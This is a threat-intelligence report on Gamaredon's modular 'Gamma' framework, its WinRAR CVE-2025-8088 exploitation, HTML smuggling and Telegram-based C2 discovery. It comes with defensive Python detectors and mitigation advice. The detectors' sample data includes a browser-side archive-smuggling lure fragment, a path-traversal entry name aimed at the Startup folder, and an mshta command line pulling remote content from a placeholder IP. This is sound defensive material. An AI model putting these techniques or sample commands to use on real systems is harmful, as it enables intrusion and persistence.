
Gamaredon in 2026: Russia's Most Persistent APT Upgrades to a Modular Framework and Exploits WinRAR for Initial Access

Executive Summary

Gamaredon remains one of the most operationally active nation-state threat groups in the world — not because it is technically the most sophisticated, but because it has relentlessly targeted Ukraine since 2014 and has shown a consistent willingness to absorb new capabilities and adapt its tradecraft as defenders adjust. In early 2026, Sekoia’s Threat Detection and Research team documented a significant evolution in the group’s toolkit: a more modular, more evasive infection chain anchored by exploitation of CVE-2025-8088 in WinRAR, HTML smuggling for delivery, and a five-family malware framework covering every phase of the kill chain under a unified “Gamma” naming taxonomy.

Critically, Gamaredon was not alone in adopting CVE-2025-8088 rapidly after disclosure. Google’s Threat Intelligence Group documented the same vulnerability being exploited in the same timeframe by Sandworm and Turla — two other Russian state-affiliated operators — suggesting a pattern of rapid coordinated or parallel adoption of newly published exploits across Russia’s offensive cyber ecosystem.

The implications for organisations beyond Ukraine are not zero. Gamaredon’s targeting is focused on Ukrainian government, military, and critical infrastructure, but the group’s TTPs — HTML smuggling delivery, Startup folder persistence, Telegram dead drop resolvers — are shared infrastructure patterns that defenders in any sector should be hunting for in their environments.

Group Profile and Attribution

Gamaredon has operated under numerous names across the threat intelligence community: Primitive Bear (CrowdStrike), ACTINIUM (Microsoft, now Aqua Blizzard), Shuckworm (Symantec), UAC-0010 (UA-CERT), and Armageddon (Ukrainian media reporting). The group was publicly attributed to Russia’s Federal Security Service (FSB) by Ukraine’s Security Service (SBU) in 2021, which named specific FSB officers it alleged were responsible for the group’s operations — a level of attribution specificity rarely seen.

Gamaredon has been active since at least 2014, with targeting focused almost exclusively on Ukrainian government ministries, military personnel, law enforcement, and critical infrastructure. Its goals have been remarkably consistent across twelve years: persistent access to Ukrainian networks for intelligence collection, and pre-positioning for potential disruptive operations.

What has changed is the sophistication of the tooling. Gamaredon originally relied on commodity remote access tools — most notably the commercially available Remote Manipulator System RAT — before transitioning to a custom framework internally referred to as “Pteranodon.” Over the following years, Pteranodon fragmented into an increasingly modular collection of distinct components, each optimised for a specific kill chain phase. By January 2026, that evolution had produced the “Gamma” framework documented by Sekoia.

The Gamma Malware Framework

Sekoia has unified Gamaredon’s modular toolset under a single naming taxonomy using the “Gamma” prefix. Five distinct families have been identified:

GammaPhish handles initial access. It is the delivery component — in the 2026 campaign, a weaponised XHTML file sent as a spearphishing attachment. The file embeds a 1×1 pixel tracking request to a Supabase endpoint, silently confirming to the operator that the victim opened the lure before any exploit fires. This telemetry technique dates to at least 2018 within the group’s tradecraft.

GammaLoad is the intermediate staging layer. Fetched after initial access, it functions as a reconnaissance and configuration agent — it fingerprints the host, updates C2 network configuration in the registry using dead drop resolver data, and fetches and executes arbitrary VBScript payloads. The VBScript loaders operate in a four-stage cascade, with each stage designed to update C2 addresses, establish persistence, and prepare the next stage.

GammaWorm handles lateral movement and propagation — primarily via USB drives, allowing the group to move across air-gapped or isolated segments of a target network.

GammaSteel is the data theft component, focused on credential collection and document exfiltration from compromised hosts.

GammaWipe is the destructive payload — a wiper component available for deployment when the operational objective shifts from espionage to disruption.

The modular architecture serves a clear purpose: individual components can be updated, replaced, or withheld depending on the target and the operational phase. Defenders who detect GammaLoad do not automatically have intelligence on GammaSteel unless they can also retrieve and analyse the payloads fetched during a live intrusion.

2026 Campaign: CVE-2025-8088 Exploitation and HTML Smuggling

The campaign Sekoia began tracking in January 2026 — first surfaced by a YARA rule deployed in late December 2025 — represents the group’s most evasive delivery chain to date.

Initial delivery begins with a spearphishing XHTML file. XHTML was chosen over standard HTML because many email security gateways treat XHTML as a document type rather than a potential script host, reducing the probability of automated blocking. The file uses HTML smuggling to deliver a RAR archive to the victim’s machine entirely client-side — the archive is assembled in the browser’s memory from encoded data embedded in the XHTML, bypassing network-level inspection that would otherwise catch a malicious archive download.
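A static triage routine for the two GammaPhish artefacts described above (the external 1×1 tracking image and client-side assembly of a RAR archive from encoded data), as an added example that is not Sekoia's tooling or the campaign's code. The RAR signatures are the public RAR4/RAR5 magic bytes; the lure fragment, the beacon host and the base64 payload (a RAR5 header padded with zeros) are constructed for the example.

```python
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Added example, not Sekoia's tooling. RAR4 and RAR5 file signatures.
RAR_MAGICS = (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00")
# Browser APIs a client-side archive builder needs; any one alone is weak, several together are not.
SMUGGLING_APIS = ("atob(", "new Blob(", "createObjectURL(", ".download")
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{48,}={0,2})["\']')

def _local(tag: str) -> str:
    """Strip the XHTML namespace: '{http://www.w3.org/1999/xhtml}img' -> 'img'."""
    return tag.rsplit("}", 1)[-1].lower()

def triage_xhtml(document: str) -> dict:
    """Static triage of an XHTML attachment for GammaPhish-style artefacts."""
    findings = {"tracking_pixels": [], "smuggling_apis": set(), "embedded_archives": 0}
    for el in ET.fromstring(document).iter():
        tag = _local(el.tag)
        if tag == "img":
            # A 1x1 (or 0x0) image fetched from an external host is an open-tracking beacon.
            tiny = el.get("width", "").strip() in ("0", "1") and el.get("height", "").strip() in ("0", "1")
            host = urlsplit(el.get("src", "")).hostname
            if tiny and host:
                findings["tracking_pixels"].append(host)
        elif tag == "script" and el.text:
            findings["smuggling_apis"].update(api for api in SMUGGLING_APIS if api in el.text)
            for literal in B64_LITERAL.findall(el.text):
                try:
                    blob = base64.b64decode(literal, validate=True)
                except ValueError:  # binascii.Error subclasses ValueError
                    continue
                if blob.startswith(RAR_MAGICS):  # decoded data carries a RAR archive header
                    findings["embedded_archives"] += 1
    return findings

def build_sample_lure() -> str:
    """Constructed lure fragment for the example: a RAR5 header padded with zeros, not a real archive."""
    payload = base64.b64encode(RAR_MAGICS[1] + b"\x00" * 56).decode()
    return f"""<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Report</title></head><body>
<img src="https://beacon.example.invalid/open?id=42" width="1" height="1"/>
<script type="text/javascript">
var data = "{payload}";
var bytes = atob(data);
var link = document.createElement("a");
link.href = URL.createObjectURL(new Blob([bytes]));
link.download = "Report_2026.rar";
</script></body></html>"""
```

Running `triage_xhtml(build_sample_lure())` reports one external beacon host, all four assembly APIs and one embedded archive; a lure that only stages the data and builds the archive in a later fetch would still trip the API check but not the signature check.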

CVE-2025-8088 is the mechanism that makes the RAR archive dangerous. The vulnerability is a path traversal flaw in WinRAR patched in version 7.13 that allows a specially crafted archive to extract files to arbitrary filesystem locations, overriding the user-selected extraction destination. The malicious archive presents to the victim as containing a single visible PDF decoy. It actually contains two files: the decoy and a hidden HTA file. The path traversal extracts the HTA directly into the user’s %AppData%\Microsoft\Windows\Start Menu\Programs\Startup folder (that is, ...\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) — meaning it executes automatically on the next Windows login without requiring any additional user interaction.

Startup persistence via the dropped HTA file is clean and reliable. The HTA invokes mshta.exe with a URL argument that includes a legitimate-looking domain (www.bbc.com) in the path — a deliberate evasion technique designed to blend into network logs where analysts might dismiss a BBC-linked request as benign.

Dead Drop Resolvers via Telegram handle C2 discovery. Rather than embedding hard-coded IP addresses (which defenders can block and which become stale as infrastructure rotates), Gamaredon stores current C2 addresses as content in Telegram channels it controls. GammaLoad reads the channel content to obtain the current server IP before initiating a callback. This pattern makes infrastructure blocking significantly harder — blocking Telegram is operationally unacceptable for most organisations, and the actual C2 IPs rotate on timescales that outpace manual blocklist maintenance.

The VBScript loader cascade operates across four distinct execution stages recovered by Sekoia from forensic artefacts on compromised hosts. Each stage: fingerprints the host, reads and updates the C2 network configuration in the registry from the Telegram-hosted dead drop resolver, fetches a new VBScript payload from the C2, and executes it.

Cross-Operator CVE Adoption: A Russian Pattern

Gamaredon’s use of CVE-2025-8088 is not isolated. Google’s Threat Intelligence Group documented the same vulnerability being exploited in the same timeframe by two other Russian state-affiliated groups: Sandworm (GRU Unit 74455) and Turla (FSB, separate from Gamaredon). The speed at which this flaw moved across three distinct Russian operators after public disclosure is consistent with previous observations of rapid cross-operator exploit sharing within Russia’s state offensive ecosystem, either through shared tooling infrastructure or deliberate coordination.

The practical implication for defenders is that any network with users running unpatched WinRAR should treat the entire CVE-2025-8088 patch cycle as a critical priority — not because of Gamaredon specifically, but because at minimum three distinct and capable Russian operators had working exploitation chains for this vulnerability within weeks of its disclosure.

Targeting and Victim Profile

Gamaredon’s stated and observed targeting remains concentrated on Ukraine. Primary victims include Ukrainian government ministries, military and intelligence personnel, law enforcement agencies, and critical infrastructure operators in the energy and telecommunications sectors. Secondary targeting has occasionally extended to Ukrainian diaspora organisations and to non-Ukrainian entities with significant Ukraine-related contacts.

The group is not known to have conducted significant operations against Western European or North American targets. However, organisations that maintain communication with Ukrainian government counterparts, operate infrastructure relevant to the conflict (including defence contractors, logistics providers, and humanitarian organisations), or have personnel with Ukrainian connections represent an elevated exposure — not because Gamaredon specifically targets the West, but because spearphishing infrastructure may reach these individuals as part of broader targeting campaigns, and a WinRAR installation on any network represents the same exposure regardless of geography.

Defensive Implications

Patch WinRAR immediately. CVE-2025-8088 is patched in version 7.13. Given active exploitation by at least three Russian state-affiliated groups, this patch should be treated with the same urgency as a CISA KEV entry — which it should join if it has not already.

Hunt for XHTML/HTML smuggling delivery. XHTML files and JavaScript-based archive assembly are increasingly common delivery mechanisms that bypass conventional attachment filtering. Email gateway rules should flag XHTML attachments; endpoint telemetry should capture file creation events that do not correlate with user-initiated downloads.

Monitor the Windows Startup folder for unexpected HTA files. Path traversal delivery to %AppData%\...\Startup is a reliable persistence mechanism that generates a distinctive artefact. Endpoint detection rules for HTA files appearing in the Startup directory outside of expected software installations should be in place on all Windows endpoints.
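Two checks that follow from the traversal-into-Startup chain described in the campaign section and from this hunting recommendation, as an added example (not Sekoia's rules): resolving archive entry names against the chosen extraction directory to see which ones escape it and which land in the per-user Startup folder, and filtering file-creation events for script-host files written there. The profile path, archive listing and events are constructed; the allowlist of writer images is an assumed tuning knob.

```python
import ntpath

# Added example, not from the report. Constructed profile; the per-user Startup folder is
# %AppData%\Microsoft\Windows\Start Menu\Programs\Startup (%AppData% already ends in \AppData\Roaming).
STARTUP_DIR = r"C:\Users\analyst\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SCRIPT_HOST_EXTS = {".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf"}

def is_inside(path: str, directory: str) -> bool:
    """Case-insensitive check that a Windows path lies strictly under a directory."""
    p = ntpath.normcase(ntpath.normpath(path))
    d = ntpath.normcase(ntpath.normpath(directory)).rstrip("\\") + "\\"
    return p.startswith(d)

def resolve_entry(dest_dir: str, entry_name: str) -> str:
    """Where a naive extractor writes an entry: rooted or drive-qualified names ignore the destination."""
    if entry_name[:1] in ("\\", "/") or ntpath.splitdrive(entry_name)[0]:
        return ntpath.normpath(entry_name)
    return ntpath.normpath(ntpath.join(dest_dir, entry_name))  # join, then collapse '..' segments

def triage_archive(dest_dir: str, entry_names) -> dict:
    """Classify each listed entry as 'ok', 'traversal', or 'traversal->startup'."""
    verdicts = {}
    for name in entry_names:
        target = resolve_entry(dest_dir, name)
        if is_inside(target, dest_dir):
            verdicts[name] = "ok"
        elif is_inside(target, STARTUP_DIR):
            verdicts[name] = "traversal->startup"
        else:
            verdicts[name] = "traversal"
    return verdicts

def suspicious_startup_writes(events, allowed_images=frozenset()) -> list:
    """File-creation events (dicts with 'image' and 'path') that drop a script-host file in Startup."""
    return [
        ev for ev in events
        if is_inside(ev["path"], STARTUP_DIR)
        and ntpath.splitext(ev["path"])[1].lower() in SCRIPT_HOST_EXTS
        and ev["image"].lower() not in allowed_images  # tuning knob for known installers
    ]

DEST = r"C:\Users\analyst\Downloads\report"  # constructed extraction destination
SAMPLE_ENTRIES = ["Report_2026.pdf", r"\Windows\Temp\x.vbs",
                  r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.hta"]
SAMPLE_EVENTS = [  # constructed endpoint telemetry
    {"image": "WinRAR.exe", "path": STARTUP_DIR + r"\update.hta"},
    {"image": "msiexec.exe", "path": STARTUP_DIR + r"\Vendor Tray.lnk"},
    {"image": "WinRAR.exe", "path": DEST + r"\Report_2026.pdf"},
]
```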

Flag mshta.exe executions with external URL arguments. Legitimate enterprise mshta usage is rare. Any mshta.exe process with a URL argument — particularly one resolving to an IP address rather than a known internal system — should be treated as a high-priority alert.
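Command-line analysis for this alert and for the decoy-domain-in-path evasion described in the campaign section, as an added example (not Sekoia's detection logic): it flags mshta.exe launched with a URL, notes when the real host is a bare IP literal, and separates the host that is actually contacted from a well-known domain planted in the path. The list of decoy domains, the process events and the 192.0.2.0/24 address (documentation range) are constructed for the example.

```python
import ipaddress
import ntpath
import re
from urllib.parse import urlsplit

# Added example, not from the report. Constructed list of well-known domains an operator may plant
# in a URL *path* so the request looks benign in logs (the report describes www.bbc.com used this way).
DECOY_DOMAINS = ("www.bbc.com", "www.microsoft.com", "www.google.com")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
IMAGE_RE = re.compile(r'^\s*"?([^"\s]+)"?')  # first token of the command line, quoted or not

def analyse_mshta(cmdline: str) -> list:
    """Reasons a process command line is suspicious; empty for non-mshta or local-file launches."""
    m = IMAGE_RE.match(cmdline)
    if not m or ntpath.basename(m.group(1)).lower() != "mshta.exe":
        return []
    reasons = []
    for url in URL_RE.findall(cmdline):
        parts = urlsplit(url)
        host = parts.hostname or ""  # the host that is really contacted
        reasons.append(f"mshta loads remote content from {host}")
        try:
            ipaddress.ip_address(host)
            reasons.append("remote host is a bare IP literal, not a name")
        except ValueError:
            pass
        tail = parts.path.lower() + "?" + parts.query.lower()
        for decoy in DECOY_DOMAINS:
            if decoy in tail and host != decoy:
                reasons.append(f"decoy domain {decoy} embedded in path; real host is {host}")
    return reasons

def triage_process_events(events) -> list:
    """(pid, reasons) for every event that trips analyse_mshta; events are dicts with 'pid' and 'cmdline'."""
    hits = []
    for ev in events:
        reasons = analyse_mshta(ev["cmdline"])
        if reasons:
            hits.append((ev["pid"], reasons))
    return hits

SAMPLE_EVENTS = [  # constructed process-creation events
    {"pid": 4120, "cmdline": r'C:\Windows\System32\mshta.exe http://192.0.2.10/www.bbc.com/news/update'},
    {"pid": 4133, "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\Help\index.hta"'},
    {"pid": 4140, "cmdline": r'powershell.exe -c Invoke-WebRequest http://192.0.2.10/'},
]
```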

Block known-bad Telegram API patterns in network egress. If your organisation does not use Telegram for business communications, DNS lookups and TLS connections to api.telegram.org from endpoints are a strong indicator of dead drop resolver activity. This blocking is more operationally feasible than blocking Telegram entirely.

Apply YARA-based hunting for GammaLoad and GammaPhish artefacts. Sekoia has published YARA rules for both components. Running retrospective hunts against EDR telemetry and SIEM data will surface any prior intrusions that predated this detection research.

Gamaredon is not going away. The group’s consistency across twelve years of operations, its willingness to evolve tradecraft in response to defensive coverage, and its place within Russia’s state intelligence apparatus make it a permanent fixture of the threat landscape for any organisation with exposure to the Ukraine conflict or its wider diplomatic and defence context.